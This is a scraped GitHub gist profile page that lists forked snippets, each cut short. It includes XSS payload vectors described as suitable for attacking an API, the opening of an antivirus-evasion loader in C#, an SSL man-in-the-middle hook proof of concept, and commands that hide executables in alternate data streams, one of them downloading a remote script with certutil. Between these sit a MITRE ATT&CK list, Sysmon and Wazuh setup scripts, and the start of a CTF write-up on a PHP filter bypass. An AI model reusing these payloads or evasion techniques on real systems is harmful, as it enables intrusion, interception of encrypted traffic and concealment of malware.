Skip to content

Instantly share code, notes, and snippets.

View log4she11's full-sized avatar

log4she11

  • 127.0.0.1
View GitHub Profile
@log4she11
log4she11 / 666_lines_of_XSS_vectors.html
Created December 3, 2016 16:27 — forked from JohannesHoppe/666_lines_of_XSS_vectors.html
666 lines of XSS vectors, suitable for attacking an API copied from http://pastebin.com/48WdZR6L
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>
@log4she11
log4she11 / detected.cs
Created December 1, 2017 03:06 — forked from Arno0x/detected.cs
Hiding an AV detected assembly into another one
/*
Author: Arno0x0x, Twitter: @Arno0x0x
===================================== COMPILING =====================================
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:detected.exe detected.cs
*/
using System.Diagnostics;
using System.Runtime.InteropServices;
@log4she11
log4she11 / memMITM.cpp
Created December 19, 2017 15:26 — forked from anonymous/memMITM.cpp
SSL MITM PoC - Hook sspicli!EncryptMessage
#define SECURITY_WIN32 //Define First Before Imports.
#include <windows.h>
#include <stdio.h>
#include <Sspi.h> //Be sure to reference secur32.lib in Linker | Input | Additional Dependencies
FARPROC fpEncryptMessage; //Pointer To The Original Location
BYTE bSavedByte; //Saved Byte Overwritten by 0xCC -
@log4she11
log4she11 / thelist.txt
Created December 19, 2017 15:58 — forked from yu-yang/thelist.txt
MITRE ATT&CK Whitelisting
T1103 - AppInitDlls
T1017 - Application Deployment Software
T1131 - Authentication Package
T1009 - Binary Padding
T1042 - Change Default Association
T1116 - Code Signing
T1122 - Component Object Model Hijacking
T1003 - Credential Access
T1055 - DLL Injection
T1038 - DLL Search Order Hijacking
1980
1998
2000
2003
2004
2005
2006
2007
2008
2009
@log4she11
log4she11 / Exe_ADS_Methods.txt
Created January 13, 2020 10:28 — forked from api0cradle/Exe_ADS_Methods.md
Execute from Alternate Streams
###Add content to ADS###
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe
reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
#!/bin/bash
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
PACKETBEAT_YAML="https://raw.githubusercontent.com/socfortress/Wazuh-Rules/main/Packetbeat/packetbeat.yml"
logger() {
now=$(date +'%m/%d/%Y %H:%M:%S')
case $1 in
"-e")
mtype="ERROR:"
$sysinternals_repo = 'download.sysinternals.com'
$sysinternals_downloadlink = 'https://download.sysinternals.com/files/SysinternalsSuite.zip'
$sysinternals_folder = 'C:\Program Files\sysinternals'
$sysinternals_zip = 'SysinternalsSuite.zip'
$sysmonconfig_downloadlink = 'https://raw.githubusercontent.com/olafhartong/sysmon-modular/master/sysmonconfig.xml'
$sysmonconfig_file = 'sysmonconfig-export.xml'
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
if (Test-Path -Path $sysinternals_folder) {

PHP filter bypass - no letters or quotes

For the 2021 hack the box cyberpocalypse ctf, there was a web challenge called pcalc that included this filter:

if (strlen($formula) >= 100 || preg_match_all('/[a-z\'"]+/i', $formula)) {
    return '🤡 dont bite the hand that feeds you human 🤡';
}
try {
    eval('$pcalc = ' . $formula . ';');